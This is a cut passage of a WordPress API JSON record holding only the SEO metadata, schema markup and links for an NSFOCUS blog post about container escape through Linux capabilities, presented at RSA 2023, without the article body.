Security\"],\"articleSection\":[\"Blog\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\",\"name\":\"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"datePublished\":\"2023-06-23T15:30:00+00:00\",\"dateModified\":\"2026-04-17T18:07:40+00:00\",\"description\":\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"contentUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"width\":764,\"height\":457,\"caption\":\"Stacked colorful shipping containers at port.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/nsfocusglobal.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"An Insight into RSA 2023: Capabilities Utilization for Container Escape\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/\",\"name\":\"NSFOCUS\",\"description\":\"Security Made Smart and Simple\",\"publisher\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\",\"name\":\"NSFOCUS\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/logo-ns.png\",\"contentUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/logo-ns.png\",\"width\":248,\"height\":36,\"caption\":\"NSFOCUS\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/person\\\/fd9ab61c9c77a81bbd870f725cc0c61d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\\\/\\\/nsfocusglobal.com\"],\"url\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS","description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.","robots":{"index":"noindex","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"pt_BR","og_type":"article","og_title":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS","og_description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.","og_url":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","og_site_name":"NSFOCUS","article_published_time":"2023-06-23T15:30:00+00:00","article_modified_time":"2026-04-17T18:07:40+00:00","og_image":[{"url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","type":"","width":"","height":""}],"author":"admin","twitter_card":"summary_large_image","twitter_title":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS","twitter_description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.","twitter_image":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"9 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#article","isPartOf":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/"},"author":{"name":"admin","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/person\/fd9ab61c9c77a81bbd870f725cc0c61d"},"headline":"An Insight into RSA 2023: Capabilities Utilization for Container Escape","datePublished":"2023-06-23T15:30:00+00:00","dateModified":"2026-04-17T18:07:40+00:00","mainEntityOfPage":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/"},"wordCount":1298,"commentCount":0,"publisher":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization"},"image":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage"},"thumbnailUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","keywords":["Container Security"],"articleSection":["Blog"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","url":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","name":"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS","isPartOf":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage"},"image":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage"},"thumbnailUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","datePublished":"2023-06-23T15:30:00+00:00","dateModified":"2026-04-17T18:07:40+00:00","description":"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.","breadcrumb":{"@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#primaryimage","url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","contentUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png","width":764,"height":457,"caption":"Stacked colorful shipping containers at port."},{"@type":"BreadcrumbList","@id":"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/nsfocusglobal.com\/"},{"@type":"ListItem","position":2,"name":"An Insight into RSA 2023: Capabilities Utilization for Container Escape"}]},{"@type":"WebSite","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#website","url":"https:\/\/nsfocusglobal.com\/pt-br\/","name":"NSFOCUS","description":"Security Made Smart and Simple","publisher":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nsfocusglobal.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#organization","name":"NSFOCUS","url":"https:\/\/nsfocusglobal.com\/pt-br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/logo\/image\/","url":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2024\/08\/logo-ns.png","contentUrl":"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2024\/08\/logo-ns.png","width":248,"height":36,"caption":"NSFOCUS"},"image":{"@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/nsfocusglobal.com\/pt-br\/#\/schema\/person\/fd9ab61c9c77a81bbd870f725cc0c61d","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3dc987908fc59791d261b1006d84eb931d15287261476b9384e690ed0c568de?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/nsfocusglobal.com"],"url":"https:\/\/nsfocusglobal.com\/pt-br\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts\/24865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/comments?post=24865"}],"version-history":[{"count":0,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/posts\/24865\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/media\/24900"}],"wp:attachment":[{"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/media?parent=24865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/categories?post=24865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nsfocusglobal.com\/pt-br\/wp-json\/wp\/v2\/tags?post=24865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}